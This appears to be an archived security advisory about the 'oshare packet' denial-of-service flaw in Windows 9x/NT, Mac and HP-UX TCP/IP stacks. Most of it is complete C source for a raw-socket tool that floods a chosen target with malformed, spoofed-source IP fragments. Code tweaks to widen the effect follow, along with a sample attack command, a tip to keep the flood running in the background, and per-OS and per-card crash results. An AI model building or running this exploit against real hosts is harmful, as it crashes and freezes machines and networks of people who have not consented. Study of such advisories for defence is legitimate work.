COMMAND
kernel
SYSTEMS AFFECTED
Windows 9x, NT, Mac
PROBLEM
R00t Zer0 found following. Windows98 crashed by the packet which
added a hand to the value of the IP header of the packet a little.
(From now, the packet of this structure is called with "oshare
packet".) A Macintosh crashed by the "oshare packet" in the
same way, too. But, it isn't realized by this program. It will be
released soon.
Reboot hangs freely if it becomes blue screen when Windows98
receives "oshare packet". When blue screen comes out, the function
of the network can't be used any more after it. The error of
TCP/IP is started in the case of the Macintosh, and the function
of the network can't be used any more (see below for some code
modification).
/****************************************************************************/
/* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */
/* */
/* */
/* This program transmits the "oshare" packet which starts a machine aga- */
/* in or crash. But, because it can't pass through the router, it can be */
/* carried out only in the same segment. */
/* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
/* nged, it has already tested that it becomes possible to kill Mac, too. */
/* ----------------------------------------- */
/* Written by R00t Zer0 */
/* E-Mail : defcon0@ugtop.com */
/* Web URL : http://www.ugtop.com/defcon0/index.htm */
/****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
u_short in_cksum( u_short *, int );
int send_oshare_packet( int, u_long );
u_short
in_cksum( u_short *addr, int len )
{
int nleft = len;
u_short *w = addr;
int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*( u_char *)( &answer ) = *( u_char *)w;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum & 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
int
send_oshare_packet( int sock_send, u_long dst_addr )
{
char *packet;
int send_status;
struct iphdr *ip;
struct sockaddr_in to;
packet = ( char *)malloc( 40 );
ip = ( struct iphdr *)( packet );
memset( packet, 0, 40 );
ip->version = 4;
ip->ihl = 11;
ip->tos = 0x00;
ip->tot_len = htons( 44 );
ip->id = htons( 1999 );
ip->frag_off = htons( 16383 );
ip->ttl = 0xff;
ip->protocol = IPPROTO_UDP;
ip->saddr = htonl( inet_addr( "1.1.1.1" ) );
ip->daddr = dst_addr;
ip->check = in_cksum( ( u_short *)ip, 44 );
to.sin_family = AF_INET;
to.sin_port = htons( 0x123 );
to.sin_addr.s_addr = dst_addr;
send_status = sendto( sock_send, packet, 40, 0,
( struct sockaddr *)&to, sizeof( struct sockaddr ) );
free( packet );
return( send_status );
}
int
main( int argc, char *argv[] )
{
char tmp_buffer[ 1024 ];
int loop, loop2;
int sock_send;
u_long src_addr, dst_addr;
u_short src_port, dst_port;
struct hostent *host;
struct sockaddr_in addr;
time_t t;
if( argc != 3 )
{
printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
exit( -1 );
}
t = time( 0 );
srand( ( u_int )t );
memset( &addr, 0, sizeof( struct sockaddr_in ) );
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr( argv[1] );
if( addr.sin_addr.s_addr == -1 )
{
host = gethostbyname( argv[1] );
if( host == NULL )
{
printf( "Unknown host %s.\n", argv[1] );
exit( -1 );
}
addr.sin_family = host->h_addrtype;
memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
}
memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
{
perror( "Getting raw send socket" );
exit( -1 );
}
printf( "\n\"Oshare Packet\" sending" );
fflush( stdout );
for( loop = 0; loop < atoi( argv[2] ); loop++ )
{
for( loop2 = 0; loop2 < 1000; loop2++ )
send_oshare_packet( sock_send, dst_addr );
fprintf( stderr, "." );
fflush( stdout );
}
printf( "\n\nDone.\n\n" );
fflush( stdout );
close( sock_send );
exit( 0 );
}
And here's little modification in the source. For example...
ip->ihl = 22;
ip->frag_off = htons( -16383 );
Compile, and send heaps of packets ('./oshare x.x.x.x 300' for
example) to local Windows 98/NT box. It should freeze (literally)
while packets are travelling. It recovers after the 'attack' is
finished (shouldn't be a big problem to leave a process in the
background that will send packets forever). This was tested
against Windows 98 and Windows NT 4.0 (2 Workstations and 1 Server
all with SP4 applied, no post SP4 hotfixes). It will also affect
HP-UX (tested against 10.20), but you wonn't get more than
"jumping mouse" effect. Load is higher, but machine is functional.
If you can't maake it work, the cause is thought to be here:
1) A difference in the version of OS.
It works with ja, and it may not work with en.
2) Modification of the code.
When it was rewritten, my acquaintance's machine crashed a
part. This modification makes the cause of the bug much
more vague, Only, by 100 packet.
'send_oshare_packet'
ip->ihl = rand() % 16;
ip->tot_len = rand() % 0xffff;
More testings showed something you may find interresting. The
differences in behavior seem to be due to the type of network card
installed in the machine. Here is a VERY small list:
- win95 is broken and bluescreens all the time.
- win98 with the following network cards...
* LinkSys ISA (ne2000 chipset): Spontaneous Reboot.
* LinkSys PCI (ne2000): Blue Screen
* 3c509 (ISA): Blue Screen
* 3c590 (PCI): Some Blue Screens, others Hang
* 3c905 (PCI): Hangs until packets stop
comming, then complete wakup.
Also, Fabio Bastiglia Oliva posted following info. The table
below shows the oshare tests results that he made in his network
enviroment.
-----------------------------------
Effects:
S - Frozen until packet stop
F - Frozen
B - Blue Screen
R - Reboot
-----------------------------------
AtkSrc (Attack Source):
L - Linux
S - SunOS
-----------------------------------
Info:
F - Full Install
U1 - Up from Windows 3.xx
U2 - Up from Windows 95 (4.00.950)
U3 - Up from Windows 95 (4.00.1111)
C - Conseal PC Firwall Installed
-----------------------------------
Lang (Language):
E - English
P - Portuguese
-----------------------------------
Test Results:
+----------------------+------+--------+--------+----------+-----------+
| OS & Version | Vuln | Effect | AtkSrc | Info | Lang |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.950 | YES | F B | L S | F | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B | L S | U1 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B S | L S | U1 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.1111 | YES | F B | L S | F | E P |
| or |------+--------+--------+----------+-----------+
|Windows 95 950b | YES | F B | L S | U1 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B S | L S | U1 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows 98 4.10.1998 | YES | R | L S | F | E P |
| |------+--------+--------+----------+-----------+
| | YES | F R | L S | U2 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F R | L S | U3 | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | F C | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | U2 C | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | U3 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows NT 4 SP4 | NO | --- | --- | F | E |
+----------------------+------+--------+--------+----------+-----------+
|Windows 2000 Beta | NO | --- | --- | F | E |
+----------------------+------+--------+--------+----------+-----------+
|Linux Slackware 2.0.36| NO | --- | --- | --- | --- |
+----------------------+------+--------+--------+----------+-----------+
Multiple acronyms means that the test results are the same or the
test generate different/multiple effects in the same system.
SOLUTION
Nothing yet. SP1 for Win98 should address that. As for NT,
there was only one post reporting to be vulnerable without any
confirmation.